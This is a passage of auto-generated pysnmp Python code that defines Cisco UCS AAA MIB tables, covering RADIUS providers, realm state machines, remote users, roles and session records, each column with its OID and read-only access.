cucsAaaRadiusProviderDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderDn.setStatus('current')
cucsAaaRadiusProviderRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderRn.setStatus('current')
cucsAaaRadiusProviderAuthPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderAuthPort.setStatus('current')
cucsAaaRadiusProviderDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderDescr.setStatus('current')
cucsAaaRadiusProviderEncKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderEncKey.setStatus('current')
cucsAaaRadiusProviderKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderKey.setStatus('current')
cucsAaaRadiusProviderKeySet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderKeySet.setStatus('current')
cucsAaaRadiusProviderName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderName.setStatus('current')
cucsAaaRadiusProviderOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderOrder.setStatus('current')
cucsAaaRadiusProviderRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderRetries.setStatus('current')
cucsAaaRadiusProviderService = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 13), CucsAaaRadiusService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderService.setStatus('current')
cucsAaaRadiusProviderTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 22, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRadiusProviderTimeout.setStatus('current')
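# cucsAaaRealmFsmTable (1.3.6.1.4.1.9.9.719.1.2.49): FSM status for the AAA realm.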
cucsAaaRealmFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49), )
if mibBuilder.loadTexts: cucsAaaRealmFsmTable.setStatus('current')
cucsAaaRealmFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRealmFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaRealmFsmEntry.setStatus('current')
cucsAaaRealmFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRealmFsmInstanceId.setStatus('current')
cucsAaaRealmFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmDn.setStatus('current')
cucsAaaRealmFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmRn.setStatus('current')
cucsAaaRealmFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmCompletionTime.setStatus('current')
cucsAaaRealmFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 5), CucsAaaRealmFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmCurrentFsm.setStatus('current')
cucsAaaRealmFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmDescr.setStatus('current')
cucsAaaRealmFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmFsmStatus.setStatus('current')
cucsAaaRealmFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmProgress.setStatus('current')
cucsAaaRealmFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmRmtErrCode.setStatus('current')
cucsAaaRealmFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmRmtErrDescr.setStatus('current')
cucsAaaRealmFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 49, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmRmtRslt.setStatus('current')
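# cucsAaaRealmFsmStageTable (1.3.6.1.4.1.9.9.719.1.2.50): per-stage FSM detail for the AAA realm.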
cucsAaaRealmFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50), )
if mibBuilder.loadTexts: cucsAaaRealmFsmStageTable.setStatus('current')
cucsAaaRealmFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRealmFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaRealmFsmStageEntry.setStatus('current')
cucsAaaRealmFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRealmFsmStageInstanceId.setStatus('current')
cucsAaaRealmFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmStageDn.setStatus('current')
cucsAaaRealmFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmStageRn.setStatus('current')
cucsAaaRealmFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmStageDescr.setStatus('current')
cucsAaaRealmFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmStageLastUpdateTime.setStatus('current')
cucsAaaRealmFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1, 6), CucsAaaRealmFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmStageName.setStatus('current')
cucsAaaRealmFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmStageOrder.setStatus('current')
cucsAaaRealmFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmStageRetry.setStatus('current')
cucsAaaRealmFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 50, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmStageStageStatus.setStatus('current')
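# cucsAaaRealmFsmTaskTable (1.3.6.1.4.1.9.9.719.1.2.23): realm FSM task items (completion, flags, sequence id).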
cucsAaaRealmFsmTaskTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23), )
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskTable.setStatus('current')
cucsAaaRealmFsmTaskEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRealmFsmTaskInstanceId"))
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskEntry.setStatus('current')
cucsAaaRealmFsmTaskInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskInstanceId.setStatus('current')
cucsAaaRealmFsmTaskDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskDn.setStatus('current')
cucsAaaRealmFsmTaskRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskRn.setStatus('current')
cucsAaaRealmFsmTaskCompletion = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 4), CucsFsmCompletion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskCompletion.setStatus('current')
cucsAaaRealmFsmTaskFlags = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 5), CucsFsmFlags()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskFlags.setStatus('current')
cucsAaaRealmFsmTaskItem = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 6), CucsAaaRealmFsmTaskItem()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskItem.setStatus('current')
cucsAaaRealmFsmTaskSeqId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskSeqId.setStatus('current')
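# cucsAaaRemoteUserTable (1.3.6.1.4.1.9.9.719.1.2.24): remotely authenticated user objects and their config state.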
cucsAaaRemoteUserTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24), )
if mibBuilder.loadTexts: cucsAaaRemoteUserTable.setStatus('current')
cucsAaaRemoteUserEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRemoteUserInstanceId"))
if mibBuilder.loadTexts: cucsAaaRemoteUserEntry.setStatus('current')
cucsAaaRemoteUserInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRemoteUserInstanceId.setStatus('current')
cucsAaaRemoteUserDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserDn.setStatus('current')
cucsAaaRemoteUserRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserRn.setStatus('current')
cucsAaaRemoteUserDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserDescr.setStatus('current')
cucsAaaRemoteUserName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserName.setStatus('current')
cucsAaaRemoteUserPwd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserPwd.setStatus('current')
cucsAaaRemoteUserPwdSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 8), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserPwdSet.setStatus('current')
cucsAaaRemoteUserConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 9), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserConfigState.setStatus('current')
cucsAaaRemoteUserConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserConfigStatusMessage.setStatus('current')
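# cucsAaaRoleTable (1.3.6.1.4.1.9.9.719.1.2.25): AAA role objects and their privilege (cucsAaaRolePriv).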
cucsAaaRoleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25), )
if mibBuilder.loadTexts: cucsAaaRoleTable.setStatus('current')
cucsAaaRoleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRoleInstanceId"))
if mibBuilder.loadTexts: cucsAaaRoleEntry.setStatus('current')
cucsAaaRoleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRoleInstanceId.setStatus('current')
cucsAaaRoleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleDn.setStatus('current')
cucsAaaRoleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleRn.setStatus('current')
cucsAaaRoleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleDescr.setStatus('current')
cucsAaaRoleIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleIntId.setStatus('current')
cucsAaaRoleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleName.setStatus('current')
cucsAaaRolePriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 7), CucsAaaAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRolePriv.setStatus('current')
cucsAaaRoleConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 8), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleConfigState.setStatus('current')
cucsAaaRoleConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleConfigStatusMessage.setStatus('current')
cucsAaaRolePolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRolePolicyLevel.setStatus('current')
cucsAaaRolePolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 11), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRolePolicyOwner.setStatus('current')
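# cucsAaaSessionTable (1.3.6.1.4.1.9.9.719.1.2.26): active user sessions (host, login time, terminal, UI, refresh period, timeout).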
cucsAaaSessionTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26), )
if mibBuilder.loadTexts: cucsAaaSessionTable.setStatus('current')
cucsAaaSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSessionInstanceId"))
if mibBuilder.loadTexts: cucsAaaSessionEntry.setStatus('current')
cucsAaaSessionInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSessionInstanceId.setStatus('current')
cucsAaaSessionDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionDn.setStatus('current')
cucsAaaSessionRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionRn.setStatus('current')
cucsAaaSessionHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionHost.setStatus('current')
cucsAaaSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionId.setStatus('current')
cucsAaaSessionIntDel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionIntDel.setStatus('current')
cucsAaaSessionLoginTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 7), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLoginTime.setStatus('current')
cucsAaaSessionPid = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionPid.setStatus('current')
cucsAaaSessionSwitchId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 9), CucsNetworkSwitchId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionSwitchId.setStatus('current')
cucsAaaSessionTerm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionTerm.setStatus('current')
cucsAaaSessionUi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 11), CucsAaaUserInterface()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionUi.setStatus('current')
cucsAaaSessionUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionUser.setStatus('current')
cucsAaaSessionRefreshPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 13), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionRefreshPeriod.setStatus('current')
cucsAaaSessionSessionTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionSessionTimeout.setStatus('current')
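# cucsAaaSessionInfoTable -- AaaSessionInfo managed objects (1.3.6.1.4.1.9.9.719.1.2.56); rows indexed by cucsAaaSessionInfoInstanceId.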
cucsAaaSessionInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56), )
if mibBuilder.loadTexts: cucsAaaSessionInfoTable.setStatus('current')
cucsAaaSessionInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSessionInfoInstanceId"))
if mibBuilder.loadTexts: cucsAaaSessionInfoEntry.setStatus('current')
cucsAaaSessionInfoInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSessionInfoInstanceId.setStatus('current')
cucsAaaSessionInfoDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoDn.setStatus('current')
cucsAaaSessionInfoRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoRn.setStatus('current')
cucsAaaSessionInfoAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoAddress.setStatus('current')
cucsAaaSessionInfoDestIp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoDestIp.setStatus('current')
cucsAaaSessionInfoEtime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 6), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoEtime.setStatus('current')
cucsAaaSessionInfoId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoId.setStatus('current')
cucsAaaSessionInfoPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoPriv.setStatus('current')
cucsAaaSessionInfoType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 9), CucsAaaCimcSessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoType.setStatus('current')
cucsAaaSessionInfoUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoUser.setStatus('current')
cucsAaaSessionInfoUserType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 11), CucsAaaSession()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoUserType.setStatus('current')
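# cucsAaaSessionInfoTableTable -- AaaSessionInfoTable managed objects (1.3.6.1.4.1.9.9.719.1.2.57); rows indexed by cucsAaaSessionInfoTableInstanceId.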
cucsAaaSessionInfoTableTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57), )
if mibBuilder.loadTexts: cucsAaaSessionInfoTableTable.setStatus('current')
cucsAaaSessionInfoTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSessionInfoTableInstanceId"))
if mibBuilder.loadTexts: cucsAaaSessionInfoTableEntry.setStatus('current')
cucsAaaSessionInfoTableInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSessionInfoTableInstanceId.setStatus('current')
cucsAaaSessionInfoTableDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoTableDn.setStatus('current')
cucsAaaSessionInfoTableRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoTableRn.setStatus('current')
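# cucsAaaSessionLRTable -- AaaSessionLR managed objects (1.3.6.1.4.1.9.9.719.1.2.27); rows indexed by cucsAaaSessionLRInstanceId.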
cucsAaaSessionLRTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27), )
if mibBuilder.loadTexts: cucsAaaSessionLRTable.setStatus('current')
cucsAaaSessionLREntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSessionLRInstanceId"))
if mibBuilder.loadTexts: cucsAaaSessionLREntry.setStatus('current')
cucsAaaSessionLRInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSessionLRInstanceId.setStatus('current')
cucsAaaSessionLRDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRDn.setStatus('current')
cucsAaaSessionLRRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRRn.setStatus('current')
cucsAaaSessionLRAffected = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRAffected.setStatus('current')
cucsAaaSessionLRCause = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 5), CucsConditionCause()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRCause.setStatus('current')
cucsAaaSessionLRChangeSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRChangeSet.setStatus('current')
cucsAaaSessionLRCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 7), CucsConditionCode()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRCode.setStatus('current')
cucsAaaSessionLRCreated = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 8), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRCreated.setStatus('current')
cucsAaaSessionLRDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRDescr.setStatus('current')
